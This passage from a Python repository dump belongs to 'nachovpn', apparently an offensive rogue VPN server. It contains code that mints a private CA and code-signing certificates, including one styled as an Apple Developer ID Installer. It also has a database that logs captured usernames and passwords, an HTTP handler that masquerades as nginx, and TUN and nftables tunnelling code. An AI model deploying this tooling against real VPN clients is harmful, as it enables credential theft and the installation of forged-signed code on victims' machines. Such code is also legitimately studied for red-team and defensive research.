self.ca_key_path = os.path.join(self.cert_dir, 'ca.key') self.ca_cert_path = os.path.join(self.cert_dir, 'ca.crt') # Check if CA cert already exists if os.path.exists(self.ca_cert_path) and os.path.exists(self.ca_key_path): logging.info("Loading existing CA certificate") with open(self.ca_cert_path, 'rb') as f: self.ca_cert = x509.load_pem_x509_certificate(f.read(), default_backend()) with open(self.ca_key_path, 'rb') as f: self.ca_key = serialization.load_pem_private_key(f.read(), password=None, backend=default_backend()) return self.ca_key_path, self.ca_cert_path logging.info("Generating new CA certificate") # Generate CA private key self.ca_key = rsa.generate_private_key( public_exponent=65537, key_size=2048, backend=default_backend() ) # Build CA certificate subject = x509.Name([ x509.NameAttribute(NameOID.COMMON_NAME, self.ca_common_name), #x509.NameAttribute(NameOID.ORGANIZATION_NAME, self.ca_common_name), ]) self.ca_cert = x509.CertificateBuilder().subject_name( subject ).issuer_name( subject ).public_key( self.ca_key.public_key() ).serial_number( x509.random_serial_number() ).not_valid_before( datetime.datetime.now(datetime.timezone.utc) - datetime.timedelta(days=1) ).not_valid_after( datetime.datetime.now(datetime.timezone.utc) + datetime.timedelta(days=3650) ).add_extension( x509.BasicConstraints(ca=True, path_length=None), critical=True ).add_extension( x509.SubjectKeyIdentifier.from_public_key(self.ca_key.public_key()), critical=False ).add_extension( x509.AuthorityKeyIdentifier.from_issuer_public_key(self.ca_key.public_key()), critical=False ).sign(self.ca_key, hashes.SHA256(), default_backend()) # Save CA cert and key with open(self.ca_cert_path, 'wb') as f: f.write(self.ca_cert.public_bytes(serialization.Encoding.PEM)) with open(self.ca_key_path, 'wb') as f: f.write(self.ca_key.private_bytes( encoding=serialization.Encoding.PEM, format=serialization.PrivateFormat.TraditionalOpenSSL, encryption_algorithm=serialization.NoEncryption() )) return self.ca_key_path, self.ca_cert_path def generate_codesign_certificate(self, common_name, pfx_path=None, cert_path=None, key_path=None): if not self.ca_cert or not self.ca_key: self.load_ca_certificate() if pfx_path is None: pfx_path = os.path.join(self.cert_dir, 'codesign.pfx') if cert_path is None: cert_path = os.path.join(self.cert_dir, 'codesign.cer') if key_path is None: key_path = os.path.join(self.cert_dir, 'codesign.key') if os.path.exists(cert_path) and os.path.exists(key_path) and \ os.path.exists(pfx_path) and self.cert_is_valid(cert_path, common_name): logging.info(f"Loading existing codesigning certificate for: {common_name}") return pfx_path else: logging.info(f"Generating new codesigning certificate for: {common_name}") # Generate a private key for the code signing certificate codesign_private_key = rsa.generate_private_key( public_exponent=65537, key_size=2048, backend=default_backend() ) # Create the code signing certificate subject = x509.Name([ x509.NameAttribute(NameOID.COMMON_NAME, common_name) ]) eku_list = [ ExtendedKeyUsageOID.CODE_SIGNING, ] key_usage = x509.KeyUsage( digital_signature=True, key_encipherment=False, content_commitment=False, data_encipherment=False, key_agreement=False, encipher_only=False, decipher_only=False, key_cert_sign=False, crl_sign=False ) builder = x509.CertificateBuilder().subject_name( subject ).issuer_name( self.ca_cert.subject ).public_key( codesign_private_key.public_key() ).serial_number( x509.random_serial_number() ).not_valid_before( datetime.datetime.now(datetime.timezone.utc) - datetime.timedelta(days=1) ).not_valid_after( datetime.datetime.now(datetime.timezone.utc) + datetime.timedelta(days=365) ).add_extension( x509.ExtendedKeyUsage(eku_list), critical=True, ).add_extension( key_usage, critical=True, ) # Sign the certificate with the CA private key codesign_certificate = builder.sign(self.ca_key, hashes.SHA256(), default_backend()) # Save the new certificate to a file with open(cert_path, 'wb') as f: f.write(codesign_certificate.public_bytes(serialization.Encoding.PEM)) with open(key_path, 'wb') as f: f.write(codesign_private_key.private_bytes( encoding=serialization.Encoding.PEM, format=serialization.PrivateFormat.TraditionalOpenSSL, encryption_algorithm=serialization.NoEncryption() )) # Convert to pkcs12 and save to codesign.pfx logging.info(f"Saving codesigning certificate to {pfx_path}") with open(pfx_path, "wb") as f: f.write(serialization.pkcs12.serialize_key_and_certificates( b"codesign", codesign_private_key, codesign_certificate, None, serialization.NoEncryption() )) return pfx_path def generate_apple_certificate(self, common_name="Developer ID Installer", cert_path=None, key_path=None): """Generate an Apple code signing certificate""" if cert_path is None: cert_path = os.path.join(self.cert_dir, 'apple.cer') if key_path is None: key_path = os.path.join(self.cert_dir, 'apple.key') # Generate a private key apple_private_key = rsa.generate_private_key( public_exponent=65537, key_size=2048, backend=default_backend() ) # Create Apple signing certificate subject = x509.Name([ x509.NameAttribute(NameOID.COMMON_NAME, common_name) ]) # list of EKUs eku_list = [ ExtendedKeyUsageOID.CODE_SIGNING, ObjectIdentifier("1.2.840.113635.100.6.1.14"), # Apple Developer ID Installer ObjectIdentifier("1.2.840.113635.100.4.13"), # Apple Package Signing ObjectIdentifier("1.2.840.113635.100.6.1.14"), # Apple Extension Signing ] key_usage = x509.KeyUsage( digital_signature=True, key_encipherment=False, content_commitment=False, data_encipherment=False, key_agreement=False, encipher_only=False, decipher_only=False, key_cert_sign=False, crl_sign=False ) builder = x509.CertificateBuilder().subject_name( subject ).issuer_name( self.ca_cert.subject ).public_key( apple_private_key.public_key() ).serial_number( x509.random_serial_number() ).not_valid_before( datetime.datetime.utcnow() - datetime.timedelta(days=1) ).not_valid_after( datetime.datetime.utcnow() + datetime.timedelta(days=365) ).add_extension( x509.ExtendedKeyUsage(eku_list), critical=True, ).add_extension( key_usage, critical=True, ) # Sign the certificate with the CA private key apple_certificate = builder.sign(self.ca_key, hashes.SHA256(), default_backend()) # Save the new certificate to a file with open(cert_path, 'wb') as f: f.write(apple_certificate.public_bytes(serialization.Encoding.PEM)) # Save the private key with open(key_path, 'wb') as f: f.write(apple_private_key.private_bytes( encoding=serialization.Encoding.PEM, format=serialization.PrivateFormat.TraditionalOpenSSL, encryption_algorithm=serialization.NoEncryption() )) return cert_path, key_path ================================================ FILE: src/nachovpn/core/db_manager.py ================================================ from datetime import datetime import sqlite3 import logging import json import threading class DBManager: def __init__(self, db_path='database.db'): self.db_path = db_path self.conn = None self.lock = threading.Lock() self.setup_database() def setup_database(self): """Initialize the database connection and create tables if they don't exist.""" try: self.conn = sqlite3.connect(self.db_path, check_same_thread=False) cursor = self.conn.cursor() cursor.execute(''' CREATE TABLE IF NOT EXISTS credentials ( timestamp DATETIME DEFAULT CURRENT_TIMESTAMP, username TEXT, password TEXT, other TEXT, plugin TEXT ) ''') self.conn.commit() logging.info(f"Database initialized successfully at {self.db_path}") except sqlite3.Error as e: logging.error(f"Database initialization error: {e}") raise def log_credentials(self, username, password, plugin_name, other_data=None): """Log credentials using prepared statements.""" try: with self.lock: cursor = self.conn.cursor() cursor.execute( 'INSERT INTO credentials (username, password, other, plugin) VALUES (?, ?, ?, ?)', (username, password, json.dumps(other_data) if other_data else None, plugin_name) ) self.conn.commit() except sqlite3.Error as e: logging.error(f"Error logging credentials: {e}") def close(self): """Close the database connection.""" if self.conn: with self.lock: self.conn.close() ================================================ FILE: src/nachovpn/core/ip_manager.py ================================================ from __future__ import annotations import ipaddress, itertools, threading, time, os LEASE_SECS = int(os.getenv("LEASE_SECS", 5 * 60)) VPN_SUBNET = "10.10.0.0/16" class IPPool: """Round-robin allocator with lease/idle-timeout.""" def __init__(self, cidr: str = VPN_SUBNET): self.net = ipaddress.ip_network(cidr) self.host_iter = itertools.cycle(self.net.hosts()) self.lock = threading.Lock() # ip_str -> last_seen_epoch self.inuse: dict[str, float] = {} # Reserve gateway gw = str(next(self.host_iter)) self.inuse[gw] = float('inf') def alloc(self) -> str: now = time.time() with self.lock: for _ in range(self.net.num_addresses - 2): cand = str(next(self.host_iter)) last = self.inuse.get(cand, 0) if now - last > LEASE_SECS: self.inuse[cand] = now return cand raise RuntimeError("Address pool exhausted") def touch(self, ip: str): """Call whenever we see traffic from ip to keep the lease alive.""" with self.lock: if ip in self.inuse: self.inuse[ip] = time.time() def release(self, ip: str): with self.lock: self.inuse.pop(ip, None) ================================================ FILE: src/nachovpn/core/packet_handler.py ================================================ from pyroute2 import AsyncIPRoute from dataclasses import dataclass, field from nachovpn.core.ip_manager import IPPool from scapy.layers.l2 import Ether from scapy.packet import Raw from scapy.utils import PcapWriter import nftables import asyncio import os import logging import ipaddress import socket import time import uuid import struct import fcntl import threading TUNNEL_MTU = int(os.getenv("TUNNEL_MTU", 1400)) LEASE_SECS = int(os.getenv("LEASE_SECS", 5 * 60)) # 5 minutes LEASE_CLEANUP_INTERVAL = int(os.getenv("LEASE_CLEANUP_INTERVAL", 60)) # 1 minute VPN_SUBNET = "10.10.0.0/16" # Tunnel forwarding control TUNNEL_PRIVATE = os.getenv("TUNNEL_PRIVATE", "false").lower() == "true" TUNNEL_FULL = os.getenv("TUNNEL_FULL", "false").lower() == "true" TUNNEL_ENABLED = (TUNNEL_PRIVATE or TUNNEL_FULL) and os.name != 'nt' IFF_NO_PI = 0x1000 TUNSETIFF = 0x400454CA IFF_TUN = 0x0001 @dataclass class ClientInfo: """Information about a connected client""" sock: socket.socket ip_address: str connection_id: str callback: callable last_seen: float = field(default_factory=time.time) class PacketHandler: """ TUN-based packet handler using nftables """ def __init__(self, write_pcap=False, pcap_filename=None): """Initialize packet handler""" self.logger = logging.getLogger(__name__) self.write_pcap = write_pcap self.pcap_filename = pcap_filename self._pcap_writer = None self.logger.debug(f"[TUN] PacketHandler instantiated in thread {threading.current_thread().name}") # Initialize pyroute2 and nftables self._ipr = AsyncIPRoute() self.nft = nftables.Nftables() # TUN interface name self.tun_name = "nacho0" # Client management self.clients = {} # ip_address -> ClientInfo self.conn_to_ip = {} # connection_id -> ip_address self.ip_pool = IPPool(VPN_SUBNET) self.client_lock = asyncio.Lock() self.connection_states = {} # connection_id -> bool (True if connection is alive) # Packet queuing self.packet_queues = {} # connection_id -> asyncio.Queue self.send_tasks = {} # connection_id -> asyncio.Task # Cache TUN file descriptor self.tun_fd = None # Background tasks self._lease_cleanup_task = None self._closed = False def _setup_nftables(self): """Configure nftables rules""" try: # First try to flush and delete existing table try: self.nft.cmd('flush table inet vpn') self.nft.cmd('delete table inet vpn') self.logger.info("Flushed existing nftables rules") except Exception as e: self.logger.warning(f"Error flushing existing rules: {e}") # MSS clamp to TUNNEL_MTU tcp_mss = TUNNEL_MTU # Get the gateway IP (first host in the subnet) subnet = ipaddress.ip_network(VPN_SUBNET) gateway_ip = str(next(subnet.hosts())) # Get addr / len from VPN_SUBNET vpn_addr, vpn_len = VPN_SUBNET.split("/") # Log the tunnel forwarding configuration self.logger.info(f"Tunnel forwarding configuration: TUNNEL_PRIVATE={TUNNEL_PRIVATE}, TUNNEL_FULL={TUNNEL_FULL}") # Build nftables rules rules = [ { "add": { "table": { "family": "inet", "name": "vpn" } } }, { "add": { "chain": { "family": "inet", "table": "vpn", "name": "input", "type": "filter", "hook": "input", "prio": 0, "policy": "accept" } } }, { "add": { "chain": { "family": "inet", "table": "vpn", "name": "forward", "type": "filter", "hook": "forward", "prio": 0, "policy": "drop" } } }, { "add": { "chain": { "family": "inet", "table": "vpn", "name": "postroute", "type": "nat", "hook": "postrouting", "prio": 100 } } }, { "add": { "chain": { "family": "inet", "table": "vpn", "name": "preroute", "type": "nat", "hook": "prerouting", "prio": -100 } } }, # Allow TCP 445 to gateway IP from VPN subnet { "add": { "rule": { "family": "inet", "table": "vpn", "chain": "input", "expr": [ {"match": {"left": {"meta": {"key": "iifname"}}, "op": "==", "right": self.tun_name}}, {"match": {"left": {"payload": {"protocol": "ip", "field": "saddr"}}, "op": "in", "right": {"prefix": {"addr": vpn_addr, "len": int(vpn_len)}}}}, {"match": {"left": {"payload": {"protocol": "ip", "field": "daddr"}}, "op": "==", "right": gateway_ip}}, {"match": {"left": {"payload": {"protocol": "tcp", "field": "dport"}}, "op": "==", "right": 445}}, {"accept": None} ] } } }, # Default drop for all other VPN interface traffic { "add": { "rule": { "family": "inet", "table": "vpn", "chain": "input", "expr": [ {"match": {"left": {"meta": {"key": "iifname"}}, "op": "==", "right": self.tun_name}}, {"drop": None} ] } } }, # Accept established/related { "add": { "rule": { "family": "inet", "table": "vpn", "chain": "forward", "expr": [ {"match": {"left": {"ct": {"key": "state"}}, "op": "in", "right": {"set": ["established", "related"]}}}, {"accept": None} ] } } }, # Drop traffic to the gateway IP { "add": { "rule": { "family": "inet", "table": "vpn", "chain": "forward", "expr": [ {"match": {"left": {"payload": {"protocol": "ip", "field": "daddr"}}, "op": "==", "right": gateway_ip}}, {"drop": None} ] } } } ] # Add forwarding rules if TUNNEL_FULL is enabled if TUNNEL_FULL: self.logger.info("Adding internet forwarding rules - VPN clients can access the internet") # Drop traffic to private/LAN ranges rules.append({ "add": { "rule": { "family": "inet", "table": "vpn", "chain": "forward", "expr": [ {"match": {"left": {"payload": {"protocol": "ip", "field": "daddr"}}, "op": "in", "right": {"set": [ {"prefix": {"addr": "10.0.0.0", "len": 8}}, {"prefix": {"addr": "127.0.0.0", "len": 8}}, {"prefix": {"addr": "169.254.169.254", "len": 32}}, {"prefix": {"addr": "172.16.0.0", "len": 12}}, {"prefix": {"addr": "192.168.0.0", "len": 16}} ]}}}, {"drop": None} ] } } }) # Drop broadcast and multicast traffic rules.append({ "add": { "rule": { "family": "inet", "table": "vpn", "chain": "forward", "expr": [ {"match": {"left": {"payload": {"protocol": "ip", "field": "daddr"}}, "op": "in", "right": {"set": [ {"prefix": {"addr": "224.0.0.0", "len": 4}}, {"prefix": {"addr": "255.255.255.255", "len": 32}} ]}}}, {"drop": None} ] } } }) # Accept all other VPN client traffic to the internet rules.append({ "add": { "rule": { "family": "inet", "table": "vpn", "chain": "forward", "expr": [ {"match": {"left": {"meta": {"key": "iifname"}}, "op": "==", "right": self.tun_name}}, {"accept": None} ] } } }) # Masquerade traffic from VPN subnet rules.append({ "add": { "rule": { "family": "inet", "table": "vpn", "chain": "postroute", "expr": [ {"match": {"left": {"payload": {"protocol": "ip", "field": "saddr"}}, "op": "in", "right": {"prefix": {"addr": vpn_addr, "len": int(vpn_len)}}}}, {"match": {"left": {"meta": {"key": "oifname"}}, "op": "!=", "right": self.tun_name}}, {"masquerade": None} ] } } }) else: self.logger.info("Internet forwarding disabled - VPN clients can only access SMB share") cmd = {"nftables": rules} # Apply nftables rules rc, _, err = self.nft.json_cmd(cmd) if rc: raise RuntimeError(f"Failed to apply nftables rules: {err}") self.logger.info("Configured nftables rules") # Check if IP forwarding is enabled try: with open('/proc/sys/net/ipv4/ip_forward', 'r') as f: ip_forward = f.read().strip() if ip_forward != '1': self.logger.error(f"IP forwarding is not enabled. Please enable it with: sudo sysctl -w net.ipv4.ip_forward=1") self.logger.info("IP forwarding is enabled") except FileNotFoundError: self.logger.error("Cannot read IP forwarding status from /proc/sys/net/ipv4/ip_forward. Please ensure IP forwarding is enabled with: sudo sysctl -w net.ipv4.ip_forward=1") # Add MSS clamping rules try: self.nft.cmd(f'add rule inet vpn forward iifname {self.tun_name} ip saddr 10.10.0.0/16 tcp flags syn tcp option maxseg size set {tcp_mss}') self.nft.cmd(f'add rule inet vpn forward oifname {self.tun_name} ip daddr 10.10.0.0/16 tcp flags syn tcp option maxseg size set {tcp_mss}') self.logger.info(f"Added TCP MSS clamping rules with MSS {tcp_mss}") except Exception as e: self.logger.error(f"Failed to add TCP MSS clamping rules: {e}") raise # Verify rules were applied try: result = self.nft.cmd('list ruleset') self.logger.debug(f"Current nftables rules: {result}") except Exception as e: self.logger.error(f"Failed to list rules: {e}") except Exception as e: self.logger.error(f"Failed to configure nftables: {e}") raise async def _setup_tun_interface(self): """Create and configure the TUN interface""" try: idx = await self._ipr.link_lookup(ifname=self.tun_name) if idx: self.logger.info("Removing existing interface %s", self.tun_name) await self._ipr.link("del", index=idx[0]) # Create TUN interface await self._ipr.link( "add", ifname=self.tun_name, kind="tuntap", mode="tun", iflags=IFF_TUN | IFF_NO_PI ) # Get interface info idx = (await self._ipr.link_lookup(ifname=self.tun_name))[0] info = await self._ipr.link("get", index=idx) self.logger.debug(f"[TUN] Interface created with flags: {info[0]['flags']}") # Set MTU await self._ipr.link("set", index=idx, mtu=TUNNEL_MTU, state="up") self.logger.info(f"[TUN] Set interface MTU to {TUNNEL_MTU} bytes") subnet = ipaddress.ip_network(VPN_SUBNET) gateway_ip = str(next(subnet.hosts())) await self._ipr.addr("add", index=idx, address=gateway_ip, prefixlen=subnet.prefixlen) self.logger.info("Created %s %s/%s", self.tun_name, gateway_ip, subnet.prefixlen) # Disable IPv6 on the nacho0 interface ipv6_disable_path = f"/proc/sys/net/ipv6/conf/{self.tun_name}/disable_ipv6" if os.path.exists(ipv6_disable_path): try: with open(ipv6_disable_path, "w") as f: f.write("1\n") self.logger.info(f"Disabled IPv6 on {self.tun_name}") except Exception as e: self.logger.warning(f"Failed to disable IPv6 on {self.tun_name}: {e}") except Exception: self.logger.exception("Failed to create TUN interface") raise def _setup_tun_fd(self) -> None: """Open /dev/net/tun and bind it to the nacho0 interface.""" try: # Open the TUN character device fd = os.open("/dev/net/tun", os.O_RDWR | os.O_NONBLOCK) self.logger.debug(f"[TUN] Opened /dev/net/tun with fd={fd}") # Tell the kernel which interface this fd belongs to ifr = struct.pack( "16sH", self.tun_name.encode(), IFF_TUN | IFF_NO_PI ) self.logger.debug(f"[TUN] Setting interface flags: IFF_TUN={IFF_TUN}, IFF_NO_PI={IFF_NO_PI}") fcntl.ioctl(fd, TUNSETIFF, ifr) self.logger.debug(f"[TUN] Bound fd={fd} to interface {self.tun_name}") # Store and register with the event loop self.tun_fd = fd self._loop.add_reader(fd, self._on_tun_ready) self.logger.debug(f"[TUN] Registered fd={fd} with event loop") except Exception as e: self.logger.error(f"[TUN] Failed to open TUN file descriptor: {e}") raise def _on_tun_ready(self): """Synchronous callback when TUN fd is ready for reading""" try: self.logger.debug("[TUN] _on_tun_ready called") # Read packet from TUN interface packet_data = os.read(self.tun_fd, 65535) if not packet_data: self.logger.debug("[TUN] No data available") return self.logger.debug(f"[TUN] Raw packet data: {packet_data.hex()}") # Get IP version version = packet_data[0] >> 4 if version != 4: self.logger.debug(f"[TUN] Ignoring non-IPv4 packet: version={version}, first_bytes={packet_data[:4].hex()}") return # IPv4 packet if len(packet_data) >= 20: dest_ip = socket.inet_ntoa(packet_data[16:20]) src_ip = socket.inet_ntoa(packet_data[12:16]) self.logger.debug(f"[TUN] IPv4 packet: src={src_ip} dst={dest_ip} len={len(packet_data)}") if dest_ip: self.logger.debug(f"[TUN] Handling reply packet for dest_ip={dest_ip}, src_ip={src_ip}, len={len(packet_data)}") self._loop.create_task(self._handle_reply_packet(packet_data, dest_ip)) else: self.logger.warning(f"[TUN] Packet too short for IPv4: len={len(packet_data)}") except BlockingIOError: # No data available pass except Exception as e: self.logger.error(f"[TUN] Error reading from TUN interface: {e}") async def _lease_cleanup(self): """Periodically check for and reclaim expired client leases""" while True: await asyncio.sleep(LEASE_CLEANUP_INTERVAL) try: async with self.client_lock: now = time.time() # Find stale clients stale = [ ip for ip, client in self.clients.items() if now - client.last_seen > LEASE_SECS ] # Reclaim them for ip in stale: await self._reclaim_client(ip) except Exception as e: self.logger.error(f"Error in lease cleanup: {e}") async def _reclaim_client(self, ip_address): """Reclaim a client's resources""" try: client = self.clients.pop(ip_address, None) if client: # Remove connection mapping self.conn_to_ip.pop(client.connection_id, None) # Close the socket try: if hasattr(client, 'sock'): client.sock.close() except Exception: pass # Release the IP self.ip_pool.release(ip_address) self.logger.info(f"Reclaimed idle client {client.connection_id} with IP {ip_address}") except Exception as e: self.logger.error(f"Error reclaiming client {ip_address}: {e}") def _send_all_blocking(self, sock, data): """Send all bytes on a blocking socket.""" try: sock.setblocking(True) sock.sendall(data) return True except Exception as e: self.logger.error(f"Error sending data (blocking): {e}") return False async def _send_packets(self, connection_id, queue): """Background task to send packets from queue to client""" try: while True: # Get next packet from queue packet_data = await queue.get() if packet_data is None: # Shutdown signal break # Get client info ip_address = self.conn_to_ip.get(connection_id) if not ip_address: self.logger.warning(f"[TUN] No IP address found for connection_id {connection_id} in _send_packets") continue client = self.clients.get(ip_address) if not client: self.logger.warning(f"[TUN] No client found for IP {ip_address} in _send_packets") continue # Check if connection is still alive if not self.connection_states.get(connection_id, False): self.logger.warning(f"[TUN] Connection {connection_id} is no longer alive in _send_packets") continue self.logger.debug(f"[TUN] Sending reply packet of size {len(packet_data)} bytes to client {connection_id} (IP {ip_address})") try: await self._loop.run_in_executor( None, self._send_all_blocking, client.sock, packet_data ) except Exception as e: self.logger.error(f"[TUN] Failed to send data to client {connection_id}: {e}") self.connection_states[connection_id] = False self.destroy_session(connection_id) break # Update client state under lock async with self.client_lock: if ip_address in self.clients: self.clients[ip_address].last_seen = time.time() # Touch the IP to keep lease alive self.ip_pool.touch(ip_address) self.logger.debug(f"[TUN] Updated client {connection_id} last_seen time") # Mark task as done queue.task_done() except Exception as e: self.logger.error(f"[TUN] Error in send_packets task for {connection_id}: {e}") self.connection_states[connection_id] = False self.destroy_session(connection_id) def register_client(self, connection_id, sock, wrapper_callback): """Register a new client and assign an IP""" try: # Allocate IP from pool ip_address = self.ip_pool.alloc() # Store client info self.clients[ip_address] = ClientInfo( sock=sock, ip_address=ip_address, connection_id=connection_id, callback=wrapper_callback, last_seen=time.time() ) # Add connection mapping self.conn_to_ip[connection_id] = ip_address # Mark connection as alive self.connection_states[connection_id] = True # Create packet queue and start send task self.packet_queues[connection_id] = asyncio.Queue(maxsize=100) self.send_tasks[connection_id] = self._loop.create_task( self._send_packets(connection_id, self.packet_queues[connection_id]) ) self.logger.info(f"Registered client {connection_id} with IP {ip_address}") return ip_address except Exception as e: self.logger.error(f"Failed to register client {connection_id}: {e}") raise def destroy_session(self, connection_id): """Unregister a client and release their IP""" ip_address = self.conn_to_ip.get(connection_id) if ip_address and ip_address in self.clients: # Remove connection mapping self.conn_to_ip.pop(connection_id, None) # Remove client info del self.clients[ip_address] # Remove connection state self.connection_states.pop(connection_id, None) # Clean up packet queue and send task queue = self.packet_queues.pop(connection_id, None) if queue: # Signal task to stop self._loop.call_soon_threadsafe(queue.put_nowait, None) task = self.send_tasks.pop(connection_id, None) if task: task.cancel() # Release the IP self.ip_pool.release(ip_address) self.logger.info(f"Unregistered client {connection_id}") async def _handle_reply_packet(self, packet_data, dest_ip): """Handle a reply packet from the TUN interface""" try: # Lookup client by IP client = self.clients.get(dest_ip) self.logger.debug(f"[TUN] Handling reply packet for dest_ip={dest_ip}, client={client}") if client: # Check if connection is still alive if not self.connection_states.get(client.connection_id, False): self.logger.warning(f"[TUN] Connection {client.connection_id} is no longer alive, skipping packet") return # Use the plugin's wrapper_callback if client.callback: self.logger.debug(f"[TUN] Using callback for client {client.connection_id}") wrapped_data = client.callback(packet_data, client) else: self.logger.debug(f"[TUN] No callback for client {client.connection_id}, using raw data") wrapped_data = packet_data # Add packet to queue self.logger.debug(f"[TUN] Queuing reply packet to client {client.connection_id} (IP {dest_ip}): original size={len(packet_data)}, wrapped size={len(wrapped_data)}") queue = self.packet_queues.get(client.connection_id) if queue: try: queue.put_nowait(wrapped_data) self.logger.debug(f"[TUN] Queued reply packet to client {client.connection_id}") except asyncio.QueueFull: self.logger.warning(f"[TUN] Client {client.connection_id} queue full, dropping packet") else: self.logger.warning(f"[TUN] No queue found for client {client.connection_id}") else: self.logger.warning(f"[TUN] No client found for destination IP {dest_ip}") except Exception as e: self.logger.error(f"[TUN] Error handling reply packet: {e}") def handle_client_packet(self, packet_data, connection_id): """Handle a packet from a client""" try: self.logger.debug(f"Handling client packet for connection_id {connection_id}") ip_address = self.conn_to_ip.get(connection_id) if not ip_address: self.logger.error(f"No client found for connection_id {connection_id}") return client_info = self.clients.get(ip_address) if not client_info: self.logger.error(f"No ClientInfo found for IP {ip_address}") return src_ip = socket.inet_ntoa(packet_data[12:16]) if len(packet_data) >= 16 and (packet_data[0] >> 4) == 4 else None dst_ip = socket.inet_ntoa(packet_data[16:20]) if len(packet_data) >= 20 and (packet_data[0] >> 4) == 4 else None self.logger.debug(f"[Client] Packet: src={src_ip} dst={dst_ip} len={len(packet_data)}") # Update last seen time async def update_client(): async with self.client_lock: if ip_address in self.clients: self.clients[ip_address].last_seen = time.time() self._loop.create_task(update_client()) if TUNNEL_ENABLED: # Write packet to TUN interface if self.tun_fd is not None: try: bytes_written = os.write(self.tun_fd, packet_data) self.logger.debug(f"[TUN] Wrote {bytes_written} bytes to TUN interface") except BlockingIOError: # TUN queue is full, drop the packet self.logger.warning("TUN queue full, dropping packet") except Exception as e: self.logger.error(f"Error writing to TUN interface: {e}") self.logger.error("Stack trace:", exc_info=True) else: self.logger.error("TUN file descriptor not available") else: self.logger.debug(f"[TUN] Tunnel disabled. Received packet from {src_ip} to {dst_ip}") self.append_to_pcap(packet_data) except Exception as e: self.logger.error(f"Error handling client packet: {e}") def append_to_pcap(self, packet): """Append packet to PCAP file if enabled""" try: if self.write_pcap and self._pcap_writer is not None: pkt = self._fake_eth / Raw(load=bytes(packet)) self._pcap_writer.write(pkt) except Exception as e: self.logger.error(f'Error appending to PCAP: {e}') async def close(self): """Clean up resources""" if self._closed: return try: # Cancel background tasks if TUNNEL_ENABLED and hasattr(self, '_lease_cleanup_task'): self._lease_cleanup_task.cancel() try: await self._lease_cleanup_task except asyncio.CancelledError: pass # Close all client connections async with self.client_lock: for client in list(self.clients.values()): try: if hasattr(client, 'sock'): client.sock.close() except Exception: pass self.clients.clear() self.conn_to_ip.clear() # Clean up tunneling resources if TUNNEL_ENABLED: # Remove TUN fd from event loop if self.tun_fd is not None: try: self._loop.remove_reader(self.tun_fd) self.logger.info("Removed TUN fd from event loop") except Exception as e: self.logger.error(f"Error removing TUN fd from event loop: {e}") # Close TUN file descriptor if self.tun_fd is not None: try: os.close(self.tun_fd) self.logger.info("Closed TUN file descriptor") except Exception as e: self.logger.error(f"Error closing TUN file descriptor: {e}") try: self.nft.cmd('flush table inet vpn') self.nft.cmd('delete table inet vpn') self.logger.info("Cleaned up nftables rules") except Exception as e: self.logger.error(f"Error cleaning up nftables: {e}") # Close IPRoute if hasattr(self, '_ipr'): try: await self._ipr.close() self.logger.info("Closed IPRoute") except Exception as e: self.logger.error(f"Error closing IPRoute: {e}") # Close PCAP writer if self._pcap_writer is not None: try: self._pcap_writer.close() self.logger.info("Closed PCAP writer") except Exception as e: self.logger.error(f"Error closing PCAP writer: {e}") self._closed = True self.logger.info("PacketHandler closed successfully") except Exception as e: self.logger.error(f"Error in cleanup: {e}") raise def create_session(self, sock, wrapper_callback): """Create a new session: generate connection_id, assign IP, and register client.""" connection_id = str(uuid.uuid4()) ip_address = self.register_client(connection_id, sock, wrapper_callback) return connection_id, ip_address def get_assigned_ip(self, connection_id): """Return the assigned IP for a given connection_id, or None if not found.""" return self.conn_to_ip.get(connection_id) def assign_socket(self, connection_id, sock): """Assign or update the socket for an existing client session.""" ip_address = self.conn_to_ip.get(connection_id) if ip_address and ip_address in self.clients: self.logger.info(f"Assigning new socket to connection_id {connection_id} (IP {ip_address})") self.clients[ip_address].sock = sock return True self.logger.warning(f"assign_socket: No client found for connection_id {connection_id}") return False async def start(self): """Start the packet handler's background tasks""" try: # Set the event loop for this thread self._loop = asyncio.get_running_loop() self.logger.info(f"[TUN] PacketHandler using event loop {self._loop} in thread {threading.current_thread().name}") # Log the tunnel configuration self.logger.info(f"Tunnel configuration: TUNNEL_PRIVATE={TUNNEL_PRIVATE}, TUNNEL_FULL={TUNNEL_FULL}") if TUNNEL_ENABLED: # Initialize nftables self._setup_nftables() # Set up TUN interface await self._setup_tun_interface() # Set up TUN file descriptor self._setup_tun_fd() # Start background tasks if self._lease_cleanup_task is None: self._lease_cleanup_task = asyncio.create_task(self._lease_cleanup()) self.logger.info("Started lease cleanup task") else: self.logger.info("Tunnel disabled - skipping nftables, TUN interface, and lease cleanup setup") # Set up PCAP writer (always enabled if configured) if self.write_pcap and self.pcap_filename: os.makedirs(os.path.dirname(self.pcap_filename), exist_ok=True) self._fake_eth = Ether(src='01:02:03:04:05:06', dst='ff:ff:ff:ff:ff:ff') self.logger.info(f"Using TUN interface MAC {self._fake_eth.src} for PCAP") # Open PCAP writer self._pcap_writer = PcapWriter(self.pcap_filename, append=True) self.logger.info(f"Opened PCAP writer for {self.pcap_filename}") except Exception as e: self.logger.error(f"Error starting packet handler: {e}") raise ================================================ FILE: src/nachovpn/core/plugin_manager.py ================================================ import logging import traceback import os import asyncio class PluginManager: def __init__(self, loop=None): self.plugins = [] self.loop = loop or asyncio.get_event_loop() def register_plugin(self, plugin_class, **kwargs): """Register a plugin""" if plugin_class.__name__ in os.getenv("DISABLED_PLUGINS", "").split(","): logging.info(f"Skipping disabled plugin: {plugin_class.__name__}") return plugin = plugin_class(**kwargs) self.plugins.append(plugin) logging.info(f"Registered plugin: {plugin_class.__name__}") def handle_data(self, data, client_socket, client_ip): """Try each plugin to handle raw VPN data""" for plugin in self.plugins: try: if plugin.is_enabled() and plugin.can_handle_data(data, client_socket, client_ip): return plugin.handle_data(data, client_socket, client_ip) except Exception as e: logging.error(f"Error in plugin {plugin.__class__.__name__}: {e}") logging.error(traceback.format_exc()) return False def handle_http(self, handler): """Try each plugin to handle HTTP requests""" for plugin in self.plugins: try: if plugin.is_enabled() and plugin.can_handle_http(handler): handler.plugin_name = plugin.__class__.__name__ return plugin.handle_http(handler) except Exception as e: logging.error(f"Error in plugin {plugin.__class__.__name__}: {e}") logging.error(traceback.format_exc()) return False ================================================ FILE: src/nachovpn/core/request_handler.py ================================================ from http.server import BaseHTTPRequestHandler import logging import os class VPNStreamRequestHandler(BaseHTTPRequestHandler): def __init__(self, request, client_address, server): self.plugin_manager = server.plugin_manager super().__init__(request, client_address, server) def send_header(self, keyword, value): if keyword.lower() == 'server': value = "nginx" super().send_header(keyword, value) def handle(self): try: first_line = self.rfile.readline() if b'HTTP/' in first_line: # Parse the HTTP request line and headers self.raw_requestline = first_line if 